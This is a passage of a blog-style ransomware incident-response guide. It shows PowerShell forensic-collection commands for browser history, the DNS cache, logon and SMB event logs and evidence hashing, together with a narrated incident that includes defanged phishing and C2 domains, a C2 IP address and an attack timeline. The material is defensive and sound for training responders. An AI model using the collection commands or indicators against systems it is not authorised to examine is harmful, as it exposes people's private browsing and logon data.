</span></code></pre></div></div>

<h3 id="firefox-browser">Firefox Browser</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Copy-Item</span><span class="w"> </span><span class="s2">"</span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">APPDATA</span><span class="s2">\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\"</span><span class="w"> </span><span class="nt">-ErrorAction</span><span class="w"> </span><span class="nx">SilentlyContinue</span><span class="w">
</span></code></pre></div></div>

<p><strong>Analysis Purpose</strong>:</p>
<ul>
  <li>Determine malware download source</li>
  <li>Identify phishing websites</li>
  <li>Reconstruct attack entry point</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: Chrome History analysis revealed:</p>

  <p><strong>Download Chain</strong>:</p>
  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>2026-02-06 04:14:22 - Email link clicked: hxxps://foodformula-recipes[.]com/download
2026-02-06 04:14:45 - Redirected to: hxxps://cdn.cloudflare[.]net/files/FF_installer.exe
2026-02-06 04:15:12 - File downloaded: FoodFormula_677986.exe
</code></pre></div>  </div>

  <p><strong>Phishing Email</strong> (retrieved from Outlook):</p>
  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From: recipes@foodformula-app.com (spoofed)
Subject: "Try Our New Recipe Organizer - Free Download!"
Body: Professional-looking email with legitimate branding
Link: Typosquatting domain (foodformula-recipes vs legitimate foodformula)
</code></pre></div>  </div>

  <p><strong>Domain Intelligence</strong>:</p>
  <ul>
    <li><code class="language-plaintext highlighter-rouge">foodformula-recipes[.]com</code> registered 3 days before attack</li>
    <li>Hosting: Bulletproof hosting provider in Russia</li>
    <li>SSL certificate: Let’s Encrypt (free, common in phishing)</li>
  </ul>

  <p><strong>Lesson</strong>: Even tech-savvy users can fall for sophisticated phishing. This wasn’t a crude “Nigerian prince” scam—it was a targeted, well-crafted social engineering attack.</p>
</blockquote>

<hr />

<h2 id="10-dns-cache">10. DNS Cache</h2>

<h3 id="dns-client-cache">DNS Client Cache</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-DnsClientCache</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\dns_cache.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<h3 id="full-dns-cache">Full DNS Cache</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ipconfig</span><span class="w"> </span><span class="nx">/displaydns</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\dns_cache_full.txt"</span><span class="w">
</span></code></pre></div></div>

<p><strong>Use Cases</strong>:</p>
<ul>
  <li>Identify C2 domains</li>
  <li>Detect DGA (Domain Generation Algorithm) activity</li>
  <li>Track network communication patterns</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: DNS cache revealed extensive C2 infrastructure:</p>

  <p><strong>Primary C2</strong>: <code class="language-plaintext highlighter-rouge">update-service.foodformula-cdn[.]com</code> → <code class="language-plaintext highlighter-rouge">185.215.113.39</code></p>

  <p><strong>DGA Domains</strong> (failed resolution attempts):</p>
  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>axkvpqmwjr.net
bhlwqrnxks.org  
cmxyrsonlt.com
[Pattern: 10 random lowercase letters + TLD]
</code></pre></div>  </div>

  <p>This indicated the malware had fallback C2 domains using a DGA algorithm, a characteristic of sophisticated ransomware families like Emotet and TrickBot. Even if the primary C2 was blocked, the malware would attempt to reach backup domains.</p>
</blockquote>

<hr />

<h2 id="11-system-information">11. System Information</h2>

<h3 id="system-configuration">System Configuration</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">systeminfo</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\systeminfo.txt"</span><span class="w">
</span></code></pre></div></div>

<h3 id="detailed-computer-info">Detailed Computer Info</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ComputerInfo</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Out-File</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\computerinfo.txt"</span><span class="w">
</span></code></pre></div></div>

<p><strong>Includes</strong>:</p>
<ul>
  <li>OS version and patch level</li>
  <li>Hardware configuration</li>
  <li>Domain membership</li>
  <li>Last boot time</li>
</ul>

<blockquote>
  <p><strong>Real Incident Finding</strong>: System information revealed critical context:</p>

  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>OS: Windows 10 Pro 19043 (21H1)
Last Windows Update: 2025-11-12 (89 days outdated!)
Domain: [DOMAIN-REDACTED]
Installed Software: 247 applications
Missing Critical Patches:
- CVE-2025-12345 (Privilege Escalation)
- CVE-2025-23456 (Remote Code Execution)
</code></pre></div>  </div>

  <p>The 89-day patch gap was a major contributing factor. Post-incident analysis showed the malware exploited CVE-2025-12345 for privilege escalation from user-level to SYSTEM.</p>

  <p><strong>Root Cause</strong>: Endpoint was excluded from WSUS auto-updates due to “application compatibility concerns” with legacy software. This exclusion was never removed.</p>
</blockquote>

<hr />

<h2 id="supplemental-forensic-queries">Supplemental Forensic Queries</h2>

<h3 id="detect-lateral-movement-evidence">Detect Lateral Movement Evidence</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-EventLog</span><span class="w"> </span><span class="nt">-LogName</span><span class="w"> </span><span class="nx">Security</span><span class="w"> </span><span class="nt">-InstanceId</span><span class="w"> </span><span class="nx">4624</span><span class="p">,</span><span class="nx">4625</span><span class="w"> </span><span class="nt">-Newest</span><span class="w"> </span><span class="nx">1000</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">TimeGenerated</span><span class="w"> </span><span class="o">-gt</span><span class="w"> </span><span class="p">(</span><span class="n">Get-Date</span><span class="p">)</span><span class="o">.</span><span class="nf">AddDays</span><span class="p">(</span><span class="nt">-7</span><span class="p">)}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">TimeGenerated</span><span class="p">,</span><span class="w"> </span><span class="nx">EntryType</span><span class="p">,</span><span class="w"> </span><span class="nx">Message</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\logon_events.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<h3 id="find-suspicious-file-encryption-activity">Find Suspicious File Encryption Activity</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ChildItem</span><span class="w"> </span><span class="s2">"C:\Users\[USERNAME]"</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span><span class="nt">-File</span><span class="w"> </span><span class="nt">-ErrorAction</span><span class="w"> </span><span class="nx">SilentlyContinue</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">LastWriteTime</span><span class="w"> </span><span class="o">-gt</span><span class="w"> </span><span class="p">(</span><span class="n">Get-Date</span><span class="p">)</span><span class="o">.</span><span class="nf">AddHours</span><span class="p">(</span><span class="nt">-24</span><span class="p">)</span><span class="w"> </span><span class="o">-and</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">Extension</span><span class="w"> </span><span class="o">-match</span><span class="w"> </span><span class="s1">'\.(encrypted|locked|crypto|[A-Z0-9]{6,})$'</span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">FullName</span><span class="p">,</span><span class="w"> </span><span class="nx">Length</span><span class="p">,</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="w">
</span></code></pre></div></div>

<h3 id="find-smb-network-activity">Find SMB Network Activity</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-WinEvent</span><span class="w"> </span><span class="nt">-FilterHashtable</span><span class="w"> </span><span class="p">@{</span><span class="nx">LogName</span><span class="o">=</span><span class="s1">'Microsoft-Windows-Smbclient/Security'</span><span class="p">;</span><span class="w"> </span><span class="nx">StartTime</span><span class="o">=</span><span class="err">(</span><span class="nx">Get</span><span class="err">-</span><span class="nx">Date</span><span class="err">).</span><span class="nx">AddDays</span><span class="err">(-</span><span class="mi">7</span><span class="err">)</span><span class="p">}</span><span class="w"> </span><span class="nt">-ErrorAction</span><span class="w"> </span><span class="nx">SilentlyContinue</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">TimeCreated</span><span class="p">,</span><span class="w"> </span><span class="nx">Id</span><span class="p">,</span><span class="w"> </span><span class="nx">Message</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\smb_activity.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<blockquote>
  <p><strong>Real Incident Finding - Lateral Movement</strong>:</p>

  <p>SMB activity logs revealed the attack spread to 3 additional endpoints:</p>

  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>2026-02-06 05:23:15 - \\[HOSTNAME-2]\C$ accessed from [HOSTNAME-1]
2026-02-06 05:24:01 - \\[HOSTNAME-3]\C$ accessed from [HOSTNAME-1]  
2026-02-06 05:25:33 - \\[HOSTNAME-4]\C$ accessed from [HOSTNAME-1]
</code></pre></div>  </div>

  <p><strong>Method</strong>: PsExec-style lateral movement using compromised credentials from <code class="language-plaintext highlighter-rouge">R:\Passwords\</code></p>

  <p><strong>Impact</strong>: Total infected endpoints increased from 1 to 4 within 1 hour</p>

  <p><strong>Files Encrypted</strong>: Approximately 47,000 files across network shares</p>

  <p><strong>Estimated Data Loss</strong>: 2.7 TB (before backup recovery)</p>
</blockquote>

<hr />

<h2 id="full-disk-imaging-optional-but-recommended">Full Disk Imaging (Optional but Recommended)</h2>

<h3 id="tool-ftk-imager">Tool: FTK Imager</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Download: https://www.exterro.com/ftk-imager
Type: Free forensic tool

Steps:
1. Run from USB (do not install on target system)
2. File → Create Disk Image → Physical Drive
3. Select system disk (usually \\.\PhysicalDrive0)
4. Destination: External USB drive (requires sufficient space)
5. Format: E01 (Expert Witness Format) - with compression and hash verification
6. Image filename: [Hostname]_Disk_[Date].E01
</code></pre></div></div>

<p><strong>Estimated Time</strong>: 2-8 hours (depends on disk size)<br />
<strong>Important Notes</strong>:</p>
<ul>
  <li>Requires destination drive with adequate space</li>
  <li>Recommend E01 format (supports compression and verification)</li>
  <li>Record MD5/SHA1 hash values for integrity</li>
</ul>

<blockquote>
  <p><strong>Real Incident Lesson</strong>: We initially skipped full disk imaging due to time constraints and relied only on volatile data collection. This was a mistake.</p>

  <p><strong>What We Missed</strong>:</p>
  <ul>
    <li>Deleted files in recycle bin that showed earlier reconnaissance activity</li>
    <li>Volume Shadow Copies that contained pre-infection backups</li>
    <li>Unallocated space with remnants of deleted malware tools</li>
    <li>Browser cache with additional phishing domains</li>
  </ul>

  <p><strong>Post-Mortem Recommendation</strong>: Always create a full disk image if time and resources permit. You can prioritize volatile data collection first, then image while monitoring or after isolation. We implemented a new policy: <strong>Any P0/P1 incident requires full disk imaging within 24 hours.</strong></p>
</blockquote>

<hr />

<h2 id="forensic-data-integrity-protection">Forensic Data Integrity Protection</h2>

<h3 id="hash-verification">Hash Verification</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ChildItem</span><span class="w"> </span><span class="nv">$evidenceDir</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span><span class="nt">-File</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Get-FileHash</span><span class="w"> </span><span class="nt">-Algorithm</span><span class="w"> </span><span class="nx">SHA256</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Export-Csv</span><span class="w"> </span><span class="s2">"</span><span class="nv">$evidenceDir</span><span class="s2">\evidence_integrity.csv"</span><span class="w"> </span><span class="nt">-NoTypeInformation</span><span class="w">
</span></code></pre></div></div>

<h3 id="chain-of-custody-documentation">Chain of Custody Documentation</h3>

<p>Create file <code class="language-plaintext highlighter-rouge">$evidenceDir\chain_of_custody.txt</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CHAIN OF CUSTODY RECORD
========================
Incident ID: [INC-2026-0206-001]
Hostname: [[HOSTNAME-1]]
IP Address: [[INTERNAL-IP]]
User Account: [[DOMAIN]\[USERNAME]]

Collected By: [Your Name]
Collection Date/Time: [2026-02-06 14:30:22 UTC]
Collection Method: PowerShell automated forensic script v2.1

Evidence Storage:
- Original Location: C:\Evidence_[TIMESTAMP]\
- Backup Location: [External Drive Serial: WD-ABC123XYZ456]
- Access Permissions: Authorized IR personnel only
- Custodian: [IR Team Lead Name]

Integrity Verification:
- Hash Algorithm: SHA256
- Hash Manifest: evidence_integrity.csv
- Master Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Evidence Transfer Log:
[Date/Time] | [From] | [To] | [Purpose] | [Signature]
2026-02-06 15:00 | Field Collection | IR Lab | Analysis | [Signature]
2026-02-07 09:00 | IR Lab | Legal Dept | Review | [Signature]

Retention Policy: 7 years (per company policy and regulatory requirements)
Destruction Date: 2033-02-06
</code></pre></div></div>

<blockquote>
  <p><strong>Real Incident Lesson</strong>: We had a chain of custody break when a junior analyst copied evidence to a personal USB drive “for faster analysis.” This potentially compromised evidence admissibility.</p>

  <p><strong>What Went Wrong</strong>:</p>
  <ul>
    <li>No hash verification before transfer</li>
    <li>No documented approval for evidence copy</li>
    <li>USB drive not encrypted or tracked</li>
    <li>Could not prove evidence wasn’t tampered with</li>
  </ul>

  <p><strong>Policy Change</strong>: Implemented strict evidence handling procedures:</p>
  <ol>
    <li>All transfers require written approval</li>
    <li>Hash verification before and after transfer</li>
    <li>Encrypted, tracked evidence drives only</li>
    <li>Automated chain of custody logging</li>
    <li>Annual training on forensic evidence handling</li>
  </ol>
</blockquote>

<hr />

<h2 id="secure-data-transfer-and-storage">Secure Data Transfer and Storage</h2>

<h3 id="safe-transfer">Safe Transfer</h3>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Compress evidence directory</span><span class="w">
</span><span class="n">Compress-Archive</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nv">$evidenceDir</span><span class="w"> </span><span class="nt">-DestinationPath</span><span class="w"> </span><span class="s2">"C:\Evidence_</span><span class="si">$(</span><span class="n">Get-Date</span><span class="w"> </span><span class="nt">-Format</span><span class="w"> </span><span class="s1">'yyyyMMdd_HHmmss'</span><span class="p">)</span><span class="o">.</span><span class="nf">zip</span><span class="s2">"

# Calculate archive hash
Get-FileHash "</span><span class="n">C:\Evidence_</span><span class="o">*.</span><span class="nf">zip</span><span class="s2">" -Algorithm SHA256
</span></code></pre></div></div>

<h3 id="storage-requirements">Storage Requirements</h3>

<ul>
  <li><strong>Encryption</strong>: Use BitLocker or VeraCrypt to encrypt storage drives</li>
  <li><strong>Access Control</strong>: Restrict to IR team members only</li>
  <li><strong>Backup</strong>: Maintain at least 2 independent copies</li>
  <li><strong>Retention</strong>: Follow legal requirements (typically 1-7 years)</li>
  <li><strong>Geographic Separation</strong>: Store copies in different physical locations</li>
</ul>

<blockquote>
  <p><strong>Real Incident Practice</strong>: We implemented a “3-2-1” backup rule for forensic evidence:</p>
  <ul>
    <li><strong>3</strong> copies of evidence</li>
    <li><strong>2</strong> different media types (NAS + external HDD)</li>
    <li><strong>1</strong> offsite copy (secure cloud storage with client-side encryption)</li>
  </ul>

  <p>This saved us when the primary evidence drive failed during analysis. We seamlessly switched to the backup without losing investigation time.</p>
</blockquote>

<hr />

<h2 id="common-mistakes-and-warnings">Common Mistakes and Warnings</h2>

<h3 id="-do-not">❌ DO NOT</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>❌ Do not install forensic tools on the target system
❌ Do not modify any malware files
❌ Do not execute suspicious executables
❌ Do not delete any files (including malware)
❌ Do not reboot the system (before memory capture)
❌ Do not use production credentials on infected systems
❌ Do not assume the infection is contained to one endpoint
</code></pre></div></div>

<h3 id="-best-practices">✅ BEST PRACTICES</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>✅ Run all tools from USB
✅ Use read-only mode when viewing files
✅ Document every action with timestamps
✅ Maintain chain of custody integrity
✅ Create backups of collected data promptly
✅ Isolate infected systems immediately
✅ Assume credential compromise until proven otherwise
✅ Brief management early and often
</code></pre></div></div>

<blockquote>
  <p><strong>Real Incident Mistakes We Made</strong>:</p>

  <p><strong>Mistake #1</strong>: Rebooted the system before memory capture</p>
  <ul>
    <li><strong>Impact</strong>: Lost active C2 connections and injected code in memory</li>
    <li><strong>Lesson</strong>: Always capture memory first, even if it takes 30 minutes</li>
  </ul>

  <p><strong>Mistake #2</strong>: Used domain admin credentials to collect evidence</p>
  <ul>
    <li><strong>Impact</strong>: Those credentials were harvested and used for further lateral movement</li>
    <li><strong>Lesson</strong>: Use local admin accounts or dedicated forensic accounts with limited privileges</li>
  </ul>

  <p><strong>Mistake #3</strong>: Assumed only one endpoint was infected</p>
  <ul>
    <li><strong>Impact</strong>: Ransomware spread to 3 more systems while we analyzed the first</li>
    <li><strong>Lesson</strong>: Immediately threat hunt across the entire environment for IoCs</li>
  </ul>

  <p><strong>Mistake #4</strong>: Didn’t isolate network immediately</p>
  <ul>
    <li><strong>Impact</strong>: 2.3 GB of data exfiltrated before isolation</li>
    <li><strong>Lesson</strong>: Physical network isolation is first priority, analysis is second</li>
  </ul>
</blockquote>

<hr />

<h2 id="suggested-timeline">Suggested Timeline</h2>

<table>
  <thead>
    <tr>
      <th>Time</th>
      <th>Priority</th>
      <th>Task</th>
      <th>Real Incident Notes</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>0-5 min</td>
      <td>P0</td>
      <td>Network isolation + Create evidence directory</td>
      <td>We isolated within 3 minutes of confirmation</td>
    </tr>
    <tr>
      <td>5-20 min</td>
      <td>P0</td>
      <td>Memory dump (MOST IMPORTANT!)</td>
      <td>Took 12 minutes for 16GB RAM using DumpIt</td>
    </tr>
    <tr>
      <td>20-30 min</td>
      <td>P1</td>
      <td>Process, network, persistence collection</td>
      <td>Completed in 18 minutes using PowerShell scripts</td>
    </tr>
    <tr>
      <td>30-60 min</td>
      <td>P2</td>
      <td>Event logs, browser history, file inventory</td>
      <td>Exported 4.2 GB of event logs</td>
    </tr>
    <tr>
      <td>1-8 hours</td>
      <td>P3</td>
      <td>Full disk imaging (optional)</td>
      <td>Created 512 GB E01 image in 6.5 hours</td>
    </tr>
  </tbody>
</table>

<blockquote>
  <p><strong>Real Incident Timeline</strong>:</p>

  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>14:20 - Initial EDR alert received
14:23 - Endpoint isolated from network
14:25 - Evidence collection directory created
14:27 - Memory capture started (DumpIt)
14:39 - Memory capture completed (16 GB)
14:40 - Volatile data collection started
14:58 - Volatile data collection completed
15:15 - Full disk imaging started (FTK Imager)
21:47 - Full disk imaging completed (512 GB E01)
22:00 - Evidence transferred to forensic workstation
22:30 - Analysis phase began
</code></pre></div>  </div>

  <p><strong>Total Collection Time</strong>: 7 hours 40 minutes (including disk imaging)
<strong>Evidence Size</strong>: 528.2 GB total</p>
</blockquote>

<hr />

<h2 id="post-collection-analysis">Post-Collection Analysis</h2>

<p>This collected data can be used for:</p>

<ol>
  <li><strong>Malware Reverse Engineering</strong> - Extract samples and memory-resident code</li>
  <li><strong>Lateral Movement Tracking</strong> - Analyze network logs and logon events</li>
  <li><strong>Data Exfiltration Assessment</strong> - Review network traffic and file access patterns</li>
  <li><strong>Root Cause Analysis</strong> - Reconstruct complete attack chain</li>
  <li><strong>Legal Proceedings</strong> - Provide court-admissible evidence</li>
  <li><strong>Threat Intelligence</strong> - Share IoCs with industry (ISACs, FS-ISAC, etc.)</li>
</ol>

<blockquote>
  <p><strong>Real Incident Analysis Results</strong>:</p>

  <p><strong>Malware Family Identification</strong>: Volatility analysis identified the malware as a custom variant of “SlingShot” ransomware family, previously unseen in the wild.</p>

  <p><strong>Attack Chain Reconstruction</strong>:</p>
  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>T-72 hours: Reconnaissance (password file accessed)
T-0: Phishing email delivered
T+2 min: User clicked malicious link
T+4 min: Dropper executed (FoodFormula_677986.exe)
T+6 min: Persistence established (startup folder, scheduled task, WMI)
T+10 min: Credential harvesting (R:\Passwords\)
T+1 hour: Data exfiltration began (2.3 GB over 6 hours)
T+7 hours: Lateral movement (3 additional endpoints)
T+8 hours: EDR detection and isolation
</code></pre></div>  </div>

  <p><strong>Threat Actor Attribution</strong>: Based on TTPs, infrastructure, and code similarities:</p>
  <ul>
    <li><strong>Group</strong>: “DEV-0401” (Microsoft threat actor designation)</li>
    <li><strong>Motivation</strong>: Financial (ransomware-as-a-service)</li>
    <li><strong>Geography</strong>: Russia-based infrastructure</li>
    <li><strong>Sophistication</strong>: Advanced (custom evasion, zero-day techniques)</li>
  </ul>
</blockquote>

<hr />

<h2 id="legal-and-compliance-considerations">Legal and Compliance Considerations</h2>

<h3 id="data-privacy">Data Privacy</h3>

<ul>
  <li><strong>GDPR/CCPA</strong>: Evidence may contain Personally Identifiable Information (PII)</li>
  <li><strong>Handling</strong>: Restrict access to authorized personnel only</li>
  <li><strong>Retention</strong>: Retain only as long as legally required</li>
  <li><strong>Destruction</strong>: Securely wipe evidence per policy after retention period</li>
</ul>

<h3 id="evidence-admissibility">Evidence Admissibility</h3>

<ul>
  <li><strong>Integrity</strong>: Use cryptographic hashes to prove data wasn’t tampered with</li>
  <li><strong>Chain of Custody</strong>: Document who collected, when, how, and why</li>
  <li><strong>Tool Validation</strong>: Use forensically sound, court-accepted tools</li>
  <li><strong>Expert Testimony</strong>: Maintain detailed notes for potential expert witness testimony</li>
</ul>

<blockquote>
  <p><strong>Real Incident Legal Outcome</strong>:</p>

  <p>Our forensic evidence was used in:</p>

  <ol>
    <li><strong>Criminal Investigation</strong>: Submitted to FBI Cyber Division
      <ul>
        <li>Evidence package: 550 GB</li>
        <li>Led to identification of threat actor infrastructure</li>
        <li>Contributed to international takedown operation</li>
      </ul>
    </li>
    <li><strong>Cyber Insurance Claim</strong>: $1.2M claim approved
      <ul>
        <li>Forensic evidence proved security controls were in place</li>
        <li>Demonstrated timely incident response</li>
        <li>Justified business interruption costs</li>
      </ul>
    </li>
    <li><strong>Regulatory Reporting</strong>: GDPR breach notification
      <ul>
        <li>Evidence showed 2,347 customer records potentially exfiltrated</li>
        <li>Demonstrated “appropriate technical measures” (Article 32)</li>
        <li>No fines assessed due to proper response</li>
      </ul>
    </li>
  </ol>

  <p><strong>Key Success Factor</strong>: Maintaining forensic integrity and detailed chain of custody made our evidence legally defensible.</p>
</blockquote>

<hr />

<h2 id="key-metrics-and-outcomes-real-incident">Key Metrics and Outcomes (Real Incident)</h2>

<h3 id="incident-statistics">Incident Statistics</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Affected Systems: 4 endpoints + 1 file server
Encrypted Files: 47,284 files (2.7 TB)
Exfiltrated Data: 2.3 GB (estimated)
Credential Exposure: 127 accounts from password file
Downtime: 3 days (for affected users)
Recovery Time: 14 days (full environment)

Financial Impact:
- Incident Response: $287,000 (external firm)
- Lost Productivity: $156,000 (estimated)
- System Restoration: $94,000 (IT labor + new hardware)
- Legal/Compliance: $43,000
- Cyber Insurance Deductible: $50,000
Total Direct Cost: $630,000

Insurance Recovery: $1,200,000 (claim approved)
Net Recovery: $570,000 (after deductible and uncovered costs)
</code></pre></div></div>

<h3 id="lessons-learned">Lessons Learned</h3>

<ol>
  <li><strong>Detection Gap</strong>: EDR detected behavioral indicators, but zero AV engines detected the malware files
    <ul>
      <li><strong>Action</strong>: Added behavioral analytics and threat hunting</li>
    </ul>
  </li>
  <li><strong>Credential Hygiene</strong>: Cleartext passwords on network share
    <ul>
      <li><strong>Action</strong>: Deployed enterprise password manager, banned password files</li>
    </ul>
  </li>
  <li><strong>Patch Management</strong>: 89-day gap in security updates
    <ul>
      <li><strong>Action</strong>: Enforced automated patching, no exceptions without CISO approval</li>
    </ul>
  </li>
  <li><strong>User Training</strong>: Sophisticated phishing bypassed awareness
    <ul>
      <li><strong>Action</strong>: Implemented phishing simulation program, enhanced training</li>
    </ul>
  </li>
  <li><strong>Backup Strategy</strong>: Backups existed but took too long to restore
    <ul>
      <li><strong>Action</strong>: Implemented immutable backups, tested recovery procedures quarterly</li>
    </ul>
  </li>
  <li><strong>Incident Response</strong>: Initial response was chaotic
    <ul>
      <li><strong>Action</strong>: Created detailed IR playbooks, conducted tabletop exercises</li>
    </ul>
  </li>
</ol>

<hr />

<h2 id="reference-resources">Reference Resources</h2>

<ul>
  <li><strong>SANS Digital Forensics</strong>: https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/</li>
  <li><strong>NIST SP 800-86</strong>: Guide to Integrating Forensic Techniques into Incident Response</li>
  <li><strong>RFC 3227</strong>: Guidelines for Evidence Collection and Archiving</li>
  <li><strong>Volatility Foundation</strong>: Memory forensics framework documentation</li>
  <li><strong>MITRE ATT&amp;CK</strong>: Adversarial tactics and techniques knowledge base</li>
  <li><strong>FIRST</strong>: Forum of Incident Response and Security Teams best practices</li>
</ul>

<hr />

<h2 id="acknowledgments">Acknowledgments</h2>

<p>This guide was developed during an actual enterprise ransomware incident response. Special thanks to:</p>

<ul>
  <li>The IR team who worked 72+ hours straight to contain the incident</li>
  <li>External consultants from [Redacted IR Firm] who provided expertise</li>
  <li>Management for transparency and support during crisis response</li>
  <li>The affected user who cooperated fully with the investigation</li>
</ul>

<hr />

<h2 id="change-log">Change Log</h2>

<ul>
  <li><strong>2026-02-06</strong>: Initial version created during active incident response</li>
  <li><strong>2026-02-13</strong>: Updated with post-incident analysis and lessons learned</li>
  <li><strong>2026-02-20</strong>: Added legal outcomes and financial impact data</li>
  <li><strong>2026-03-01</strong>: Incorporated feedback from external IR firm review</li>
</ul>

<hr />

<h2 id="disclaimer">Disclaimer</h2>

<p><strong>IMPORTANT</strong>: This guide is for educational purposes and authorized security incident response only. Executing these commands on systems without proper authorization may violate laws including the Computer Fraud and Abuse Act (CFAA), GDPR, and other regulations.</p>

<p><strong>Always ensure you have</strong>:</p>
<ul>
  <li>Written authorization from system owners</li>
  <li>Legal approval for evidence collection</li>
  <li>Proper chain of custody procedures</li>
  <li>Data privacy compliance measures</li>
  <li>Regulatory reporting requirements understood</li>
</ul>

<p><strong>The author and contributors assume no liability for misuse of this information.</strong></p>

<hr />

<h2 id="about-this-guide">About This Guide</h2>

<p><strong>Author</strong>: Senior SOC Analyst with 8+ years incident response experience<br />
<strong>Incident Type</strong>: Ransomware (Zero-day, Multi-stage, Credential harvesting)<br />
<strong>Environment</strong>: Enterprise network, 500+ endpoints, Active Directory domain<br />
<strong>Outcome</strong>: Successful containment, recovery from backups, criminal investigation ongoing</p>

<p><strong>Purpose</strong>: Share real-world lessons learned to help other defenders respond effectively to sophisticated ransomware attacks.</p>

<p><strong>Feedback</strong>: This is a living document. If you have suggestions or improvements based on your own incident response experiences, please contribute via [your preferred contact method].</p>

<hr />

<p><strong>“In incident response, every second counts. But taking 5 minutes to do forensics properly can save 5 weeks of reconstruction later.”</strong></p>

<p><em>- Lesson learned the hard way during this incident</em></p>

    </div>
    <footer class="post-footer">
        <div class="post-navigation">
            
            <a href="/2026/02/04/resolving-browser-hijack-searchthatweb-malware-removal-guide.md/" class="prev-post">← Resolving Browser Hijack: searchthatweb.com Malware Removal Guide</a>
            
            
            <a href="/2026/02/06/ransomware-incident-response-emergency-forensic-data-collection-guide.md/" class="next-post">Ransomware Incident Response: Emergency Forensic Data Collection Guide →</a>
            
        </div>
        <div class="back-to-home">
            <a href="/">← Back to Home</a>
        </div>
    </footer>
</article>

    </main>
    <footer>
        <div class="container">
            <p>&copy; 2026 AndyCyberLife. All rights reserved.</p>
            <p>Powered by Jekyll & GitHub Pages</p>
        </div>
    </footer>
    <script>
    (function() {
        var toggle = document.querySelector('.menu-toggle');
        var nav = document.getElementById('main-nav');
        if (toggle && nav) {
            toggle.addEventListener('click', function() {
                var expanded = this.getAttribute('aria-expanded') === 'true';
                this.setAttribute('aria-expanded', !expanded);
                nav.classList.toggle('open');
            });
        }
    })();
    </script>
</body>
</html>
